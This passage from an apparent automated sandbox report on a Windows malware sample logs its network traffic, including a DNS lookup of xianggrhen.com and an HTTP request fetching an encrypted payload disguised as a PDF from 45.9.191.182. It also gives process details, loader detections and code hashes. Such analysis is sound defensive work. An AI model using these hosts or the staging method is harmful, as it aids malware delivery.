Dec 10, 2024 13:10:59.648600101 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.648643017 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.649131060 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.649286032 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.649329901 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.650203943 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.650214911 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.650259018 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.651329041 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.651451111 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.651495934 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.652283907 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.652421951 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.652467012 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.653271914 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.653310061 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.653350115 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.654329062 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.654741049 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.654784918 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.655318975 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.655369043 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.655410051 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.656416893 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.656428099 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.656464100 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.657387018 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.657583952 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.657628059 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.658421993 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.658664942 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.658709049 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.659434080 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.659924984 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.659969091 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.660468102 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.660485983 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.660523891 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.661487103 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.661499023 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.661545038 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.662580013 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.662687063 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.662733078 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.663466930 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.711622000 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.801872969 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.801884890 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.801954985 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.802436113 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.802519083 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.802578926 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.802886963 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.803565979 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.803577900 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.803612947 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.804608107 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.804653883 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.804851055 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.805722952 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.805735111 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.805772066 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.806615114 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.806660891 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.807470083 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.807683945 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.807697058 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.807734013 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.808682919 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.808728933 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.808890104 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.809753895 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.809793949 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.809802055 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.810849905 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.810894966 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.810928106 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.811913013 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.811923981 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.811961889 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.813051939 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.813096046 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.813195944 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.814150095 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.814163923 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.814192057 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.814909935 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.814937115 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.814950943 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.816040993 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.816085100 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.816121101 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.817121029 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.817132950 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.817167044 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.818257093 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.818301916 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.818305016 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.819411039 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.819423914 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.819453001 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.820353985 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.820395947 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.820498943 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.821307898 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.821321011 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.821343899 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.822263956 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.822307110 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.822308064 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.823445082 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.823489904 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.823493004 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.824665070 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.824703932 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.824795008 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.825814009 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.825824976 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.825853109 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.827461004 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.827516079 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.827598095 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.828530073 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.828573942 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.828704119 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.829613924 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.829624891 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.829665899 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.830735922 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.830746889 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.830785990 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.831897974 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.831923008 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.831939936 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.832935095 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.832945108 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.832979918 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.833759069 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.833770990 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.833811045 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.834718943 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.834729910 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.834777117 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.835652113 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.835692883 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.835788012 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.836757898 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.836774111 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.836796999 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.837802887 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.837845087 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:10:59.838073015 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:10:59.883474112 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:11:02.400975943 CET	80	49735	45.9.191.182	192.168.2.4
Dec 10, 2024 13:11:02.401030064 CET	49735	80	192.168.2.4	45.9.191.182
Dec 10, 2024 13:11:28.680329084 CET	49735	80	192.168.2.4	45.9.191.182

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 10, 2024 13:10:55.787425041 CET	59538	53	192.168.2.4	1.1.1.1
Dec 10, 2024 13:10:56.122893095 CET	53	59538	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 10, 2024 13:10:55.787425041 CET	192.168.2.4	1.1.1.1	0xf79b	Standard query (0)	xianggrhen.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 10, 2024 13:10:56.122893095 CET	1.1.1.1	192.168.2.4	0xf79b	No error (0)	xianggrhen.com		45.9.191.182	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

xianggrhen.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49735	45.9.191.182	80	7648	C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 13:10:56.249774933 CET	89	OUT	GET /composure/Vuglyxyuvio.pdf HTTP/1.1 Host: xianggrhen.com Connection: Keep-Alive
Dec 10, 2024 13:10:57.494647026 CET	258	IN	HTTP/1.1 200 OK etag: "13e808-6757db0c-17cc71;;;" last-modified: Tue, 10 Dec 2024 06:09:16 GMT content-type: application/pdf content-length: 1304584 accept-ranges: bytes date: Tue, 10 Dec 2024 12:10:57 GMT server: LiteSpeed connection: Keep-Alive
Dec 10, 2024 13:10:57.494946003 CET	1236	IN	Data Raw: 0e 56 76 a9 0a d1 b6 a4 43 10 bb 00 9e c3 01 92 1b 41 50 e9 a7 52 6d b1 35 20 da 31 cc 5c 6b d1 6d 20 96 19 3f fc 13 85 56 3d 0c 04 44 54 c4 a1 ca 83 0a 12 a4 8e a5 7d 2c f9 d3 f5 a6 0e f7 7b 25 9d 31 76 25 45 0c e8 f4 58 4b 95 0c 3f 0a 52 f3 d9 Data Ascii: VvCAPRm5 1\km ?V=DT},{%1v%EXK?RJ-v+Zz#(rK?9#!X2;x({E[&}QQCwP\|&q&eyAO69?3k1LfP.To2.^R`Y0c\_
Dec 10, 2024 13:10:57.495059013 CET	1236	IN	Data Raw: 7e ef 91 df 7b 38 22 d5 84 2f bb 60 d2 b2 5d e3 7b 97 cf 52 7f d7 24 5a ec c6 c2 8a 9f 89 51 1f 7d b5 cc ff 62 ba 5f e0 f5 b6 12 15 fb 3b 5d e3 64 34 ca 60 47 ac b8 a7 27 3d f8 de 52 59 82 7e b6 13 d7 98 b8 20 3f 61 c9 60 6b 95 c2 13 36 1f be 28 Data Ascii: ~{8"/`]{R$ZQ}b_;]d4`G'=RY~ ?a`k6(8dqU`fp.bJQ+-ea(7y#!<Z]~BZ3vKX}-[X"OF'8:}DY&\|UT{uj=T0mPOV9w.n;{+O31E[Q5
Dec 10, 2024 13:10:57.495071888 CET	448	IN	Data Raw: b3 ca 16 aa 5d 28 dd 15 a8 39 4f f4 47 8f 26 4c f9 5c bd 5e 10 c5 06 3f 66 50 1a 60 c3 84 cc 50 b5 e4 56 41 04 28 1b 8b dd 1f 68 6c d9 b4 67 2c d1 6e 5a 19 44 98 0d de 4f d9 ea e9 a0 07 48 74 3b de 05 a4 ed d7 11 9a f9 1c 23 99 5c 96 92 b2 2c 96 Data Ascii: ](9OG&L\^?fP`PVA(hlg,nZDOHt;#\,?#ey(%9/fVB{!$}/1P>2e=I%au[te23_R? BW>Xzn3MnAMWyc#}]P [^ML
Dec 10, 2024 13:10:57.495083094 CET	1236	IN	Data Raw: f1 c7 c8 45 2f 90 d9 2a 79 6f e4 69 8e f2 98 ae 00 40 3e 3c 3c 1c 34 11 00 67 2e 52 1a 4c d2 31 f2 f0 f9 b1 06 ce 1d 7a 64 f1 d6 5d 16 e3 50 ab ab ef 58 73 ee 05 e9 ae a7 c4 a0 2f 1c 89 e9 5d be ef 3b a1 93 ff af 08 4f 4d 6b b9 7e 9c 7d 76 fd fc Data Ascii: E/*yoi@><<4g.RL1zd]PXs/];OMk~}vkC9&'<Hs9%N{>H0SSiFl:1JGhj~("X\|hh,l{hFP7\|i2sN>)OjLHq(
Dec 10, 2024 13:10:57.495224953 CET	1236	IN	Data Raw: 12 a0 0c 91 b6 44 8b 51 e2 19 d9 a7 41 b6 e1 ad b4 ac 80 ec a0 17 e2 94 e9 8d 7c 0b 4f 2d 53 61 a1 4a 7e 4a be 33 46 c0 a6 bb 22 7c ce 40 0f 3e dc ac ff 73 81 2a 18 3e ba 25 85 77 d6 0d 80 27 4b a3 6f 32 91 08 44 85 df b0 12 ac 4b a0 b1 0c 40 ae Data Ascii: DQA\|O-SaJ~J3F"\|@>s*>%w'Ko2DK@X(Hcu81}b/aQk,o5zJNe$rd&^4aD,],iw0(qvXG{dy_;cL%F5C
Dec 10, 2024 13:10:57.495238066 CET	1236	IN	Data Raw: 05 e2 4c 05 3e c6 d2 1a 37 29 85 f7 63 18 79 de aa 1f 9f db 09 e7 43 23 39 15 7a ae bb b3 ab c1 eb dc 16 46 e1 b4 f5 de 94 c3 b8 87 c2 57 84 5c 1d 25 f0 40 d7 fe b2 e5 8b a7 5f f3 63 a6 9a 99 09 69 14 36 bc 20 4b aa ed 5a c9 52 8a 93 dd 0d 94 c1 Data Ascii: L>7)cyC#9zFW\%@_ci6 KZR6'M$f60WH2P{Gi~w!(qz5Q&t]Vm#Fw&xQO:[.ZS1(sP\|;b2=/mE'>[;iW0/!
Dec 10, 2024 13:10:57.495249987 CET	1236	IN	Data Raw: 82 a9 25 2b 07 75 83 b7 89 cc 7b bd bc e8 cf ec 17 42 46 6a 06 12 ca a9 89 2d 9b 5e dd 73 95 1a 3a 04 ab 04 b6 d4 dc c1 27 bc b8 d8 27 5b db 02 d9 8f ae c8 68 fa 0c c5 30 41 9e 83 44 8a 70 fa 17 a8 88 dd 95 12 a7 b6 c5 ad 85 da a0 1b 52 06 ea 93 Data Ascii: %+u{BFj-^s:''[h0ADpR2I3/zYgFq8<x(xm]cb6/6_TQD#pk-.Qj+X~dnIKJ{{-Fn\|!Ry<()h-FRC7&
Dec 10, 2024 13:10:57.495265961 CET	1236	IN	Data Raw: 96 9b 7e 25 45 33 9e 99 0a 56 2d 5f b1 de db 03 11 6e 90 5e 67 56 52 0f 54 6c 6e 5b 73 1d c5 eb 47 f0 30 83 90 ef f7 75 5e cd 05 0b 39 f5 30 39 70 48 d0 e3 07 b6 78 91 e5 cb 51 4e 0c de a0 87 b8 ec d7 b8 06 ba 30 90 12 31 a0 96 f3 e7 7d 72 c4 df Data Ascii: ~%E3V-_n^gVRTln[sG0u^909pHxQN01}r\|m74o<[CxRt6ETJeJk_p}y0tEEvq1XlX]{#Z(`L+,6%mB$+Nd{i\fYC*B`1z'Z
Dec 10, 2024 13:10:57.495280981 CET	1236	IN	Data Raw: ad f5 c9 58 2a 8c d1 a4 6e 1a 39 a9 6a 99 43 f6 71 92 4d 3f 24 6c 4e af 11 51 fe af e8 c7 5f 7b c4 d9 90 1e 15 9c 39 04 4a 91 96 dd 77 81 8d a8 e2 c1 41 7d a8 5e 5b 3c 03 24 98 90 ed 10 5a cf d3 a1 fd 1c ed b8 7b 4c b2 00 91 09 99 6e 85 d0 e7 1d Data Ascii: X*n9jCqM?$lNQ_{9JwA}^[<$Z{Lndl:#YkM@dHt+7&s[>I<t[sY&[>-n5U(/-/u}Uz!E3/DTSYEl~3+dv.b;4w!X=
Dec 10, 2024 13:10:57.614306927 CET	1236	IN	Data Raw: 71 6e 4e 04 80 33 d9 62 10 40 30 c2 ce c4 66 97 bf bc ff 7a 71 82 90 b5 7d f4 27 5a 11 41 7e e1 57 6f 08 ec 03 3c 51 7f 47 18 b2 62 61 84 7d 34 ef 3a 85 e1 69 4d 7b f0 16 f3 a5 e9 f0 3f be 66 ee 06 cc 79 48 12 7b 08 0c b8 69 47 cd 9c ea 3a af 1c Data Ascii: qnN3b@0fzq}'ZA~Wo<QGba}4:iM{?fyH{iG:.XHe_X4YX$MP4IBg>GE/j1]JDPa2&Zd[z0,3-Hc$;U^U9o?{]`>A@C?

Target ID:	0
Start time:	07:10:55
Start date:	10/12/2024
Path:	C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe"
Imagebase:	0xd80000
File size:	189'120 bytes
MD5 hash:	013270D9FD4600004204ED3BA5897636
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1983217284.0000000006320000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1959753041.0000000003247000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	07:11:25
Start date:	10/12/2024
Path:	C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe"
Imagebase:	0xba0000
File size:	189'120 bytes
MD5 hash:	013270D9FD4600004204ED3BA5897636
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	07:11:26
Start date:	10/12/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 8060 -s 1168
Imagebase:	0x680000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	13.8%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	3.5%
Total number of Nodes:	173
Total number of Limit Nodes:	10

Executed Functions

Function 063044F0 Relevance: 16.1, Strings: 12, Instructions: 1143COMMON

Download Yara Rule

Strings

$dq, xrefs: 06304793
$dq, xrefs: 06304957
$dq, xrefs: 06304783
$dq, xrefs: 06304E3A
,hq, xrefs: 06304FBA
$dq, xrefs: 06304E2A
$dq, xrefs: 06304947
$dq, xrefs: 063049F7
4, xrefs: 06304ED5
$dq, xrefs: 06304DE1
$dq, xrefs: 06304DD1
$dq, xrefs: 06304A07

Memory Dump Source

Source File: 00000000.00000002.1983135438.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6300000_LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.jbxd

Similarity

API ID:
String ID: ,hq$4$$dq$$dq$$dq$$dq$$dq$$dq$$dq$$dq$$dq$$dq
API String ID: 0-55242283
Opcode ID: b6712f5c03dfa1f6bb3e28a76640fd314096d38c3a6498d1b8c0a1ae6a4ebe99
Instruction ID: a1409363477ac536f6d7bc72a255373a3f9061bd02222f9289798ff9c908cb05
Opcode Fuzzy Hash: b6712f5c03dfa1f6bb3e28a76640fd314096d38c3a6498d1b8c0a1ae6a4ebe99
Instruction Fuzzy Hash: CDB2F974A00218DFEB54CF95C994BADB7B6FF48300F158199EA05AB2A5CB70DD89CF90

Function 06304827 Relevance: 8.0, Strings: 6, Instructions: 495COMMON

Download Yara Rule

Strings

,hq, xrefs: 06304FBA
$dq, xrefs: 06304E2A
$dq, xrefs: 06304947
$dq, xrefs: 063049F7
4, xrefs: 06304ED5
$dq, xrefs: 06304DD1

Memory Dump Source

Source File: 00000000.00000002.1983135438.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6300000_LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.jbxd

Similarity

API ID:
String ID: ,hq$4$$dq$$dq$$dq$$dq
API String ID: 0-967947350
Opcode ID: c386c5288ce69597cafe6bc18ea8fdea2c0175909bed1706df2e8ec9b475fc91
Instruction ID: 45793ec0b0225565809c36ba1d86b22684c39d849fe3a5c559b650e5dafd649c
Opcode Fuzzy Hash: c386c5288ce69597cafe6bc18ea8fdea2c0175909bed1706df2e8ec9b475fc91
Instruction Fuzzy Hash: 62220B74A00215CFEB64CF64D9A4BADB7B6FF48300F1481A9D509AB3A5DB709D89CF90

Function 06204A40 Relevance: 6.0, Strings: 4, Instructions: 983
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

phq, xrefs: 062055FA
TJiq, xrefs: 06204BE2
xbgq, xrefs: 06204B6D
Tedq, xrefs: 06205163

Memory Dump Source

Source File: 00000000.00000002.1982813717.0000000006200000.00000040.00000800.00020000.00000000.sdmp, Offset: 06200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6200000_LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.jbxd

Similarity

API ID:
String ID: TJiq$Tedq$phq$xbgq
API String ID: 0-2187010727
Opcode ID: b34e99363df13ae5bd5a295a4a0d9767555b5b61c0f7ed4136ac8323dec33c91
Instruction ID: bb41d503a81823467a45490ac594757327234bf6118c10c28d60f2baacf52d9c
Opcode Fuzzy Hash: b34e99363df13ae5bd5a295a4a0d9767555b5b61c0f7ed4136ac8323dec33c91
Instruction Fuzzy Hash: A1A2C675A10228CFDB65CF69C984A9DBBB2FF89300F1581D9D509AB366DB319E81CF40

Function 063EE330 Relevance: 3.1, Strings: 2, Instructions: 617
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

8, xrefs: 063EE44A
fiq, xrefs: 063EE45D

Memory Dump Source

Source File: 00000000.00000002.1983480753.00000000063E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_63e0000_LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.jbxd

Similarity

API ID:
String ID: fiq$8
API String ID: 0-1793836462
Opcode ID: 57a6d93afe2c640fb1c6a41257c73e78911d19c475f8884accc7eda52b7e8cd2
Instruction ID: d83ec1fd2fb05b98082c27895d237f78ebce1b270e82368afcb372781d6d6f91
Opcode Fuzzy Hash: 57a6d93afe2c640fb1c6a41257c73e78911d19c475f8884accc7eda52b7e8cd2
Instruction Fuzzy Hash: 1C52C475E006298FDBA4DF69CC54AD9B7B2FF89310F5085AAD509A7350DB30AE81CF90

Function 063EE320 Relevance: 2.7, Strings: 2, Instructions: 170
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

fiq, xrefs: 063EE45D
h, xrefs: 063EE43E

Memory Dump Source

Source File: 00000000.00000002.1983480753.00000000063E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_63e0000_LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.jbxd

Similarity

API ID:
String ID: fiq$h
API String ID: 0-25203802
Opcode ID: 45bc880ea0c75fc4a9df2424f5818095612d7d0668400fc23084afa87a65dddf
Instruction ID: 09f247b2622fbec641316e11ec5323645c331f5a1df475bec98f1bb3eb6beb9d
Opcode Fuzzy Hash: 45bc880ea0c75fc4a9df2424f5818095612d7d0668400fc23084afa87a65dddf
